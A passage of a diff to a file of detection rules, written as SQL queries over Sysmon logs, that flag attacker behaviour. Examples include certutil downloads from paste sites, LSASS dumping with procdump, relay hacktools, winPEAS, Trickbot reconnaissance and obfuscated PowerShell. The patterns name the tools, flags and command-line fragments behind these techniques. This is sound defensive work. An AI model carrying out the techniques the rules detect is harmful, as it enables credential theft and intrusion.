powershell scripts that import modules from suspicious directories", + "description": "Detects the execution of certutil with certain flags that allow the utility to download files from file-sharing websites.", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1027" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%Import-Module \"$Env:Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%Import-Module ''$Env:Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%Import-Module $Env:Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%Import-Module \"$Env:Appdata\\\\%' ESCAPE '\\' OR CommandLine LIKE '%Import-Module ''$Env:Appdata\\\\%' ESCAPE '\\' OR CommandLine LIKE '%Import-Module $Env:Appdata\\\\%' ESCAPE '\\' OR CommandLine LIKE '%Import-Module C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%ipmo \"$Env:Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%ipmo ''$Env:Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%ipmo $Env:Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%ipmo \"$Env:Appdata\\\\%' ESCAPE '\\' OR CommandLine LIKE '%ipmo ''$Env:Appdata\\\\%' ESCAPE '\\' OR CommandLine LIKE '%ipmo $Env:Appdata\\\\%' ESCAPE '\\' OR CommandLine LIKE '%ipmo C:\\\\Users\\\\Public\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '%urlcache %' ESCAPE '\\' OR CommandLine LIKE '%verifyctl %' ESCAPE '\\') AND (CommandLine LIKE '%.ghostbin.co/%' ESCAPE '\\' OR CommandLine LIKE '%.hastebin.com%' ESCAPE '\\' OR CommandLine LIKE '%.paste.ee%' ESCAPE '\\' OR CommandLine LIKE '%anonfiles.com%' ESCAPE '\\' OR CommandLine LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR 
CommandLine LIKE '%ddns.net%' ESCAPE '\\' OR CommandLine LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR CommandLine LIKE '%mediafire.com%' ESCAPE '\\' OR CommandLine LIKE '%mega.nz%' ESCAPE '\\' OR CommandLine LIKE '%paste.ee%' ESCAPE '\\' OR CommandLine LIKE '%pastebin.com%' ESCAPE '\\' OR CommandLine LIKE '%pastebin.pl%' ESCAPE '\\' OR CommandLine LIKE '%pastetext.net%' ESCAPE '\\' OR CommandLine LIKE '%privatlab.com%' ESCAPE '\\' OR CommandLine LIKE '%privatlab.net%' ESCAPE '\\' OR CommandLine LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR CommandLine LIKE '%send.exploit.in%' ESCAPE '\\' OR CommandLine LIKE '%sendspace.com%' ESCAPE '\\' OR CommandLine LIKE '%storage.googleapis.com%' ESCAPE '\\' OR CommandLine LIKE '%transfer.sh%' ESCAPE '\\' OR CommandLine LIKE '%ufile.io%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_import_module_susp_dirs.yml" + "filename": "proc_creation_win_certutil_download_file_sharing_domains.yml" }, { - "title": "OilRig APT Activity", - "id": "ce6e34ca-966d-41c9-8d93-5b06c8b97a06", - "status": "test", - "description": "Detects OilRig activity as reported by Nyotron in their March 2018 report", - "author": "Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", + "title": "Active Directory Structure Export Via Csvde.EXE", + "id": "e5d36acd-acb4-4c6f-a13f-9eb203d50099", + "status": "experimental", + "description": "Detects the execution of \"csvde.exe\" in order to export organizational Active Directory structure.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.g0049", - "attack.t1053.005", - "attack.s0111", - "attack.t1543.003", - "attack.defense_evasion", - "attack.t1112", - "attack.command_and_control", - "attack.t1071.004" + "attack.exfiltration" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 
'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%SC Scheduled Scan%' ESCAPE '\\' AND CommandLine LIKE '%\\\\microsoft\\\\Taskbar\\\\autoit3.exe%' ESCAPE '\\') OR (Image LIKE '%\\\\Windows\\\\Temp\\\\DB\\\\%' ESCAPE '\\' AND Image LIKE '%.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\system32\\\\Service.exe' ESCAPE '\\' AND (CommandLine LIKE '%i%' ESCAPE '\\' OR CommandLine LIKE '%u%' ESCAPE '\\')) OR (ParentImage LIKE '%\\\\local\\\\microsoft\\\\Taskbar\\\\autoit3.exe' ESCAPE '\\' AND CommandLine LIKE '%nslookup.exe%' ESCAPE '\\' AND CommandLine LIKE '%-q=TXT%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\csvde.exe' ESCAPE '\\' OR OriginalFileName = 'csvde.exe') AND CommandLine LIKE '% -f%' ESCAPE '\\') AND NOT ((CommandLine LIKE '% -i%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_apt_oilrig_mar18.yml" + "filename": "proc_creation_win_csvde_export.yml" }, { - "title": "Potential SMB Relay Attack Tool Execution", - "id": "5589ab4f-a767-433c-961d-c91f3f704db1", + "title": "Pingback Backdoor Activity", + "id": "b2400ffb-7680-47c0-b08a-098a7de7e7a9", "status": "test", - "description": "Detects different hacktools used for relay attacks on Windows for privilege escalation", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report", + "author": "Bhabesh Raj", "tags": [ - "attack.execution", - "attack.t1557.001" + "attack.persistence", + "attack.t1574.001" ], "falsepositives": [ - "Legitimate files with these rare hacktool names" + "Unlikely" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%PetitPotam%' ESCAPE '\\' OR Image LIKE '%RottenPotato%' ESCAPE '\\' OR Image LIKE '%HotPotato%' ESCAPE '\\' OR Image LIKE 
'%JuicyPotato%' ESCAPE '\\' OR Image LIKE '%\\\\just\\_dce\\_%' ESCAPE '\\' OR Image LIKE '%Juicy Potato%' ESCAPE '\\' OR Image LIKE '%\\\\temp\\\\rot.exe%' ESCAPE '\\' OR Image LIKE '%\\\\Potato.exe%' ESCAPE '\\' OR Image LIKE '%\\\\SpoolSample.exe%' ESCAPE '\\' OR Image LIKE '%\\\\Responder.exe%' ESCAPE '\\' OR Image LIKE '%\\\\smbrelayx%' ESCAPE '\\' OR Image LIKE '%\\\\ntlmrelayx%' ESCAPE '\\' OR Image LIKE '%\\\\LocalPotato%' ESCAPE '\\') OR (CommandLine LIKE '%Invoke-Tater%' ESCAPE '\\' OR CommandLine LIKE '% smbrelay%' ESCAPE '\\' OR CommandLine LIKE '% ntlmrelay%' ESCAPE '\\' OR CommandLine LIKE '%cme smb %' ESCAPE '\\' OR CommandLine LIKE '% /ntlm:NTLMhash %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PetitPotam%' ESCAPE '\\' OR CommandLine LIKE '%.exe -t % -p %' ESCAPE '\\') OR (CommandLine LIKE '%.exe -c \"{%' ESCAPE '\\' AND CommandLine LIKE '%}\" -z' ESCAPE '\\')) AND NOT (((Image LIKE '%HotPotatoes6%' ESCAPE '\\' OR Image LIKE '%HotPotatoes7%' ESCAPE '\\' OR Image LIKE '%HotPotatoes %' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\updata.exe' ESCAPE '\\' AND CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%msdtc%' ESCAPE '\\' AND CommandLine LIKE '%start%' ESCAPE '\\' AND CommandLine LIKE '%auto%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_relay_attacks_tools.yml" + "filename": "proc_creation_win_malware_pingback_backdoor.yml" }, { - "title": "Application Whitelisting Bypass via DLL Loaded by odbcconf.exe", - "id": "65d2be45-8600-4042-b4c0-577a1ff8a60e", + "title": "Execute Files with Msdeploy.exe", + "id": "646bc99f-6682-4b47-a73a-17b1b64c9d34", "status": "test", - "description": "Detects defence evasion attempt via odbcconf.exe execution to load DLL", - "author": "Kirill Kiryanov, Beyu Denis, Daniil Yugoslavskiy, oscd.community", + "description": "Detects file execution using the msdeploy.exe lolbin", + "author": "Beyu Denis, 
oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1218.008" + "attack.execution", + "attack.t1218" ], "falsepositives": [ - "Legitimate use of odbcconf.exe by legitimate user" + "System administrator Usage" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\odbcconf.exe' ESCAPE '\\' OR OriginalFileName = 'odbcconf.exe') AND (CommandLine LIKE '%-a%' ESCAPE '\\' OR CommandLine LIKE '%-f%' ESCAPE '\\' OR CommandLine LIKE '%/a%' ESCAPE '\\' OR CommandLine LIKE '%/f%' ESCAPE '\\' OR CommandLine LIKE '%regsvr%' ESCAPE '\\')) OR (ParentImage LIKE '%\\\\odbcconf.exe' ESCAPE '\\' AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE'))))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%verb:sync%' ESCAPE '\\' AND CommandLine LIKE '%-source:RunCommand%' ESCAPE '\\' AND CommandLine LIKE '%-dest:runCommand%' ESCAPE '\\' AND Image LIKE '%\\\\msdeploy.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_odbcconf_susp_exec.yml" + "filename": "proc_creation_win_lolbin_msdeploy.yml" }, { - "title": "UAC Bypass WSReset", - "id": "89a9a0e0-f61a-42e5-8957-b1479565a658", - "status": "test", - "description": "Detects the pattern of UAC Bypass via WSReset usable by default sysmon-config", - "author": "Christian Burkard (Nextron Systems)", + "title": "Persistence Via TypedPaths - CommandLine", + "id": "ec88289a-7e1a-4cc3-8d18-bd1f60e4b9ba", + "status": "experimental", + "description": "Detects modification addition to the 'TypedPaths' key in the user or admin registry via the commandline. 
Which might indicate persistence attempt", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.persistence" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\wsreset.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\TypedPaths%' ESCAPE '\\')" ], - "filename": "proc_creation_win_uac_bypass_wsreset_integrity_level.yml" + "filename": "proc_creation_win_registry_typed_paths_persistence.yml" }, { - "title": "HackTool - winPEAS Execution", - "id": "98b53e78-ebaf-46f8-be06-421aafd176d9", + "title": "Windows Hotfix Updates Reconnaissance Via Wmic.EXE", + "id": "dfd2fcb7-8bd5-4daa-b132-5adb61d6ad45", "status": "experimental", - "description": "WinPEAS is a script that search for possible paths to escalate privileges on Windows hosts. The checks are explained on book.hacktricks.xyz", - "author": "Georg Lauenstein (sure[secure])", + "description": "Detects the execution of wmic with the \"qfe\" flag in order to obtain information about installed hotfix updates on the system. 
This is often used by pentester and attacker enumeration scripts", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1082", - "attack.t1087", - "attack.t1046" + "attack.execution", + "attack.t1047" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'winPEAS.exe' OR (Image LIKE '%\\\\winPEASany.exe' ESCAPE '\\' OR Image LIKE '%\\\\winPEASany\\_ofs.exe' ESCAPE '\\' OR Image LIKE '%\\\\winPEASx64.exe' ESCAPE '\\' OR Image LIKE '%\\\\winPEASx64\\_ofs.exe' ESCAPE '\\' OR Image LIKE '%\\\\winPEASx86.exe' ESCAPE '\\' OR Image LIKE '%\\\\winPEASx86\\_ofs.exe' ESCAPE '\\') OR (CommandLine LIKE '% applicationsinfo%' ESCAPE '\\' OR CommandLine LIKE '% browserinfo%' ESCAPE '\\' OR CommandLine LIKE '% eventsinfo%' ESCAPE '\\' OR CommandLine LIKE '% fileanalysis%' ESCAPE '\\' OR CommandLine LIKE '% filesinfo%' ESCAPE '\\' OR CommandLine LIKE '% processinfo%' ESCAPE '\\' OR CommandLine LIKE '% servicesinfo%' ESCAPE '\\' OR CommandLine LIKE '% windowscreds%' ESCAPE '\\') OR CommandLine LIKE '%https://github.com/carlospolop/PEASS-ng/releases/latest/download/%' ESCAPE '\\' OR ParentCommandLine LIKE '% -linpeas' ESCAPE '\\' OR CommandLine LIKE '% -linpeas' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'wmic.exe' OR Image LIKE '%\\\\WMIC.exe' ESCAPE '\\') AND CommandLine LIKE '% qfe%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_winpeas.yml" + "filename": "proc_creation_win_wmic_recon_hotfix.yml" }, { - "title": "Suspicious Mofcomp Execution", - "id": "1dd05363-104e-4b4a-b963-196a534b03a1", - "status": "experimental", - "description": "Detects execution of the \"mofcomp\" utility as a child of a suspicious shell or script running utility or by having a 
supsicious path in the commandline.\nThe \"mofcomp\" utility parses a file containing MOF statements and adds the classes and class instances defined in the file to the WMI repository.\nAttackers abuse this utility to install malicious MOF scripts\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Trickbot Malware Reconnaissance Activity", + "id": "410ad193-a728-4107-bc79-4419789fcbf8", + "status": "test", + "description": "Detects potential reconnaissance activity used by Trickbot malware. Trickbot enumerates domain/network topology and executes certain commands automatically every few minutes.", + "author": "David Burkett, Florian Roth", "tags": [ - "attack.execution", - "attack.t1218" + "attack.discovery", + "attack.t1482" ], "falsepositives": [ - "Unknown" + "Rare System Admin Activity" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\mofcomp.exe' ESCAPE '\\' OR OriginalFileName = 'mofcomp.exe') AND ((ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wsl.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\cscript.exe' ESCAPE '\\') OR (CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WINDOWS\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%appdata\\%%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' AND Image LIKE '%\\\\nltest.exe' ESCAPE '\\' AND CommandLine LIKE '%/domain\\_trusts /all\\_trusts%' ESCAPE '\\')" ], - "filename": 
"proc_creation_win_mofcomp_execution.yml" + "filename": "proc_creation_win_malware_trickbot_recon_activity.yml" }, { - "title": "Delete All Scheduled Tasks", - "id": "220457c1-1c9f-4c2e-afe6-9598926222c1", - "status": "experimental", - "description": "Detects the usage of schtasks with the delete flag and the asterisk symbole to delete all tasks from the schedule of the local computer, including tasks scheduled by other users.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "HackTool - DInjector PowerShell Cradle Execution", + "id": "d78b5d61-187d-44b6-bf02-93486a80de5a", + "status": "test", + "description": "Detects the use of the Dinject PowerShell cradle based on the specific flags", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1489" + "attack.defense_evasion", + "attack.t1055" ], "falsepositives": [ "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '% /delete %' ESCAPE '\\' AND CommandLine LIKE '%/tn \\*' ESCAPE '\\' AND CommandLine LIKE '% /f%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '% /am51%' ESCAPE '\\' AND CommandLine LIKE '% /password%' ESCAPE '\\')" ], - "filename": "proc_creation_win_schtasks_delete_all.yml" + "filename": "proc_creation_win_hktl_dinjector.yml" }, { - "title": "Hermetic Wiper TG Process Patterns", - "id": "2f974656-6d83-4059-bbdf-68ac5403422f", - "status": "experimental", - "description": "Detects process execution patterns found in intrusions related to the Hermetic Wiper malware attacks against Ukraine in February 2022", - "author": "Florian Roth (Nextron Systems)", + "title": "Invoke-Obfuscation Obfuscated IEX Invocation", + "id": "4bf943c6-5146-4273-98dd-e958fd1e3abf", + "status": "test", + "description": 
"Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block", + "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", "tags": [ + "attack.defense_evasion", + "attack.t1027", "attack.execution", - "attack.lateral_movement", - "attack.t1021.001" + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\policydefinitions\\\\postgresql.exe' ESCAPE '\\' OR (CommandLine LIKE '%CSIDL\\_SYSTEM\\_DRIVE\\\\temp\\\\sys.tmp%' ESCAPE '\\' OR CommandLine LIKE '% 1> \\\\\\\\127.0.0.1\\\\ADMIN$\\\\\\_\\_16%' ESCAPE '\\') OR (CommandLine LIKE '%powershell -c %' ESCAPE '\\' AND CommandLine LIKE '%\\\\comsvcs.dll MiniDump %' ESCAPE '\\' AND CommandLine LIKE '%\\\\winupd.log full%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine REGEXP '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[' OR CommandLine REGEXP '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[' OR CommandLine REGEXP '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[' OR CommandLine REGEXP '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}' OR CommandLine REGEXP '\\*mdr\\*\\W\\s*\\)\\.Name' OR CommandLine REGEXP '\\$VerbosePreference\\.ToString\\(' OR CommandLine REGEXP '\\[String\\]\\s*\\$VerbosePreference'))" ], - "filename": "proc_creation_win_malware_hermetic_wiper_activity.yml" + "filename": "proc_creation_win_hktl_invoke_obfuscation_obfuscated_iex_commandline.yml" }, { - "title": "Unsigned AppX Installation Attempt Using Add-AppxPackage", - "id": "37651c2a-42cd-4a69-ae0d-22a4349aa04a", - "status": "experimental", - "description": "Detects usage of the \"Add-AppxPackage\" or it's alias \"Add-AppPackage\" to install unsigned AppX packages", - "author": "Nasreddine Bencherchali (Nextron 
Systems)", + "title": "Rundll32 Execution Without Parameters", + "id": "5bb68627-3198-40ca-b458-49f973db8752", + "status": "test", + "description": "Detects rundll32 execution without parameters as observed when running Metasploit windows/smb/psexec exploit module", + "author": "Bartlomiej Czyz, Relativity", "tags": [ - "attack.persistence", - "attack.defense_evasion" + "attack.lateral_movement", + "attack.t1021.002", + "attack.t1570", + "attack.execution", + "attack.t1569.002" ], "falsepositives": [ - "Installation of unsigned packages for testing purposes" + "False positives may occur if a user called rundll32 from CLI with no options" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%Add-AppPackage %' ESCAPE '\\' OR CommandLine LIKE '%Add-AppxPackage %' ESCAPE '\\') AND CommandLine LIKE '% -AllowUnsigned%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine IN ('rundll32.exe', 'rundll32'))" ], - "filename": "proc_creation_win_powershell_install_unsigned_appx_packages.yml" + "filename": "proc_creation_win_rundll32_without_parameters.yml" }, { - "title": "Fireball Archer Install", - "id": "3d4aebe0-6d29-45b2-a8a4-3dfde586a26d", + "title": "Scheduled Task Executing Powershell Encoded Payload from Registry", + "id": "c4eeeeae-89f4-43a7-8b48-8d1bdfa66c78", "status": "test", - "description": "Detects Archer malware invocation via rundll32", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the creation of a schtask that executes a base64 encoded payload stored in the Windows Registry using PowerShell.", + "author": "pH-T (Nextron Systems), @Kostastsale, @TheDFIRReport", "tags": [ "attack.execution", - 
"attack.defense_evasion", - "attack.t1218.011" + "attack.persistence", + "attack.t1053.005", + "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' AND CommandLine LIKE '%InstallArcherSvc%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '%/Create%' ESCAPE '\\' AND CommandLine LIKE '%FromBase64String%' ESCAPE '\\' AND CommandLine LIKE '%Get-ItemProperty%' ESCAPE '\\' AND (CommandLine LIKE '%HKCU:%' ESCAPE '\\' OR CommandLine LIKE '%HKLM:%' ESCAPE '\\' OR CommandLine LIKE '%registry::%' ESCAPE '\\' OR CommandLine LIKE '%HKEY\\_%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_malware_fireball.yml" + "filename": "proc_creation_win_schtasks_reg_loader.yml" }, { - "title": "Exploited CVE-2020-10189 Zoho ManageEngine", - "id": "846b866e-2a57-46ee-8e16-85fa92759be7", + "title": "Suspicious MSHTA Child Process", + "id": "03cc0c25-389f-4bf8-b48d-11878079f1ca", "status": "test", - "description": "Detects the exploitation of Zoho ManageEngine Desktop Central Java Deserialization vulnerability reported as CVE-2020-10189", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects a suspicious process spawning from an \"mshta.exe\" process, which could be indicative of a malicious HTA script execution", + "author": "Michael Haag", "tags": [ - "attack.initial_access", - "attack.t1190", - "attack.execution", - "attack.t1059.001", - "attack.t1059.003", - "attack.s0190", - "cve.2020.10189" + "attack.defense_evasion", + "attack.t1218.005", + "car.2013-02-003", + "car.2013-03-001", + "car.2014-04-003" ], "falsepositives": [ - "Unknown" + "Printer software / driver installations", + "HP software" ], "level": 
"high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%DesktopCentral\\_Server\\\\jre\\\\bin\\\\java.exe' ESCAPE '\\' AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\' OR Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR Image LIKE '%\\\\query.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\mshta.exe' ESCAPE '\\' AND ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\') OR OriginalFileName IN ('Cmd.Exe', 'PowerShell.EXE', 'pwsh.dll', 'wscript.exe', 'cscript.exe', 'Bash.exe', 'reg.exe', 'REGSVR32.EXE', 'bitsadmin.exe')))" ], - "filename": "proc_creation_win_exploit_cve_2020_10189.yml" + "filename": "proc_creation_win_mshta_susp_child_processes.yml" }, { - "title": "Sysmon Configuration Update", - "id": "87911521-7098-470b-a459-9a57fc80bdfd", - "status": "test", - "description": "Detects updates to Sysmon's configuration. 
Attackers might update or replace the Sysmon configuration with a bare bone one to avoid monitoring without shutting down the service completely", + "title": "Launch-VsDevShell.PS1 Proxy Execution", + "id": "45d3a03d-f441-458c-8883-df101a3bb146", + "status": "experimental", + "description": "Detects the use of the 'Launch-VsDevShell.ps1' Microsoft signed script to execute commands.", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1216.001" ], "falsepositives": [ - "Legitimate administrators might use this command to update Sysmon configuration." + "Legitimate usage of the script by a developer" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\Sysmon64.exe' ESCAPE '\\' OR Image LIKE '%\\\\Sysmon.exe' ESCAPE '\\') OR Description = 'System activity monitor') AND (CommandLine LIKE '%-c%' ESCAPE '\\' OR CommandLine LIKE '%/c%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%Launch-VsDevShell.ps1%' ESCAPE '\\' AND (CommandLine LIKE '%VsWherePath %' ESCAPE '\\' OR CommandLine LIKE '%VsInstallationPath %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_sysinternals_sysmon_config_update.yml" + "filename": "proc_creation_win_lolbin_launch_vsdevshell.yml" }, { - "title": "Potential LSASS Process Dump Via Procdump", - "id": "5afee48e-67dd-4e03-a783-f74259dcf998", - "status": "stable", - "description": "Detects suspicious uses of the SysInternals Procdump utility by using a special command line parameter in combination with the lsass.exe process. 
This way we're also able to catch cases in which the attacker has renamed the procdump executable.", - "author": "Florian Roth (Nextron Systems)", + "title": "Winrar Execution in Non-Standard Folder", + "id": "4ede543c-e098-43d9-a28f-dd784a13132f", + "status": "test", + "description": "Detects a suspicious winrar execution in a folder which is not the default installation folder", + "author": "Florian Roth (Nextron Systems), Tigzy", "tags": [ - "attack.defense_evasion", - "attack.t1036", - "attack.credential_access", - "attack.t1003.001", - "car.2013-05-009" + "attack.collection", + "attack.t1560.001" ], "falsepositives": [ - "Unlikely, because no one should dump an lsass process memory", - "Another tool that uses the command line switches of Procdump" + "Legitimate use of WinRAR in a folder of a software that bundles WinRAR" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '% -ma %' ESCAPE '\\' OR CommandLine LIKE '% /ma %' ESCAPE '\\') AND CommandLine LIKE '% ls%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\rar.exe' ESCAPE '\\' OR Image LIKE '%\\\\winrar.exe' ESCAPE '\\') OR Description = 'Command line RAR') AND NOT ((Image LIKE '%\\\\WinRAR%' ESCAPE '\\' OR Image LIKE '%C:\\\\Windows\\\\Temp%' ESCAPE '\\' OR Image LIKE '%\\\\UnRAR.exe%' ESCAPE '\\')))" ], - "filename": 